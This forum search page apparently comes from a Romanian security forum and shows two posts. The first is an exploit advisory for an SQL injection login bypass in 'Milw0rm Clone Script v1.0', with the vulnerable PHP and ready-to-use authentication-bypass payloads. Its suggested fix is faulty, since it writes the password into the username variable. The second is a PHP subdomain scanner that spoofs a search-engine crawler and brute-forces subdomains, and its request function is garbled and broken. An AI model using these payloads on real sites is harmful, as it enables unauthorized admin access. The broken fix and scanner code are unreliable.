Jump to content

Search the Community

Showing results for tags 'v1.0'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

Found 2 results

  1. <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><> | Exploit Title: Milw0rm Clone Script v1.0 (Auth Bypass) SQL Injection Vulnerability | | Date: 06.13.2015 | | Exploit Daddy: Walid Naceri | | Vendor Homepage: http://milw0rm.sourceforge.net/ | | Software Link: http://sourceforge.net/projects/milw0rm/files/milw0rm.rar/download | | Version: v1.0 | | Tested On: Kali Linux, Mac, Windows | |><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><| | Website exploiter: WwW.security-Dz.Com | | CALLINGout: 1337day/inj3ct0r Please admit that they got your server haha CIA | | Sorry: Sorry pancaker, you missed that one | <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><> ### vuln codez admin/login.php ### <? $usr = htmlspecialchars(trim($_POST['usr'])); ---- what are you doing? $pwd = htmlspecialchars(trim($_POST['pwd'])); ---- are you sure that you are a programmer? if($usr && $pwd){ $login = mysql_query("SELECT * FROM `site_info` WHERE `adm_usr`='".$usr."' AND `adm_pwd`='".md5($pwd)."';"); $row = mysql_num_rows($login); ----Bla Bla Bla-------- ### manual ### Go to the login admin panel Exploit 1: USER: ADMIN' OR ''=' PASS: ADMIN' OR ''=' Exploit 2: USER: ADMIN' OR 1=1# PASS: Anything Bro ### How to fix, learn bro some php again ### $usr = htmlspecialchars(trim(mysql_real_escape_string($_POST['usr']))); $usr = htmlspecialchars(trim(mysql_real_escape_string($_POST['pwd']))); Source
  2. <?php /* Bing SubDomain Scanner By injector_ma */ error_reporting(0); set_time_limit(0); if (!function_exists ("curl_exec")) die ("Fatal Error : cURL Extension is not Installed...\n"); $domain = $argv[1]; echo" _________ ___. .___ .__ / _____/__ _\_ |__ __| _/____ _____ _____ |__| ____ ______ \_____ \| | \ __ \ / __ |/ _ \ / \\__ \ | |/ \ / ___/ / \ | / \_\ \/ /_/ ( <_> ) Y Y \/ __ \| | | \\___ \ /_______ /____/|___ /\____ |\____/|__|_| (____ /__|___| /____ > \/ \/ \/ \/ \/ \/ \/ \n"; if(count(Bingsub ($domain)) == 0){ $subs = array( "app","apps","cpanel","ftp","mail","mysql","webmail","smtp","pop","pop3","direct-connect", "direct-connect-mail","record","ssl","dns","help","blog","forum","doc","home","shop", "vb","www","web","webadmin","weblog","webmail","webmaster","webservices","webserver", "log","logs","images","lab","ftpd","docs","download","downloads","about","backup", "chat","data","smtp","upload","uploads","ns1","ns2","record","ssl","imap","result", "vip","demo","beta","video" ); echo"\n\t\tNothing Found. Start Using Brute Force Methode ...\n\n"; foreach($subs as $sub){ $Check = @fsockopen("$sub.$domain", 80); if($Check){ echo "$sub.$domain : ".gethostbyname("$sub.$domain")." \n\n"; $save = fopen('subdomains.txt','ab'); fwrite($save,"http://$sub.$domain\r\n"); fclose($save); } } }else{ foreach(Bingsub ($domain) as $sub){ echo $sub." : "; echo gethostbyname($sub)."\r\n"; $save = fopen('subdomains.txt','ab'); fwrite($save,"http://".$sub."\r\n"); fclose($save); } } function Bingsub ($domain) { for($i = 1; $i <= 1000; $i += 10){ $gt = curlreq("http://www.bing.com/search?q=".urlencode("domain:$domain")."&first=$i","msnbot/1.0 (+http://search.msn.com/msnbot.htm)"); $searchme = '#<h2><a href="(.*?)"#i'; if (preg_match_all ($searchme, $gt, $matches)){ foreach ($matches[1] as $matches){ $urls[] = cleanme ($matches); } } if(!preg_match('#class="sb_pagN"#',$gt)) break; } if(!empty($urls) && is_array($urls)){ return array_unique($urls); } } function cleanme ($link){ return str_replace("www.","",parse_url($link, PHP_URL_HOST)); } function curlreq($url, $user_agent, $proxy = FALSE, $post = FALSE) { $ch = @curl_close($ch); return $source; } Sursa
×
×
  • Create New...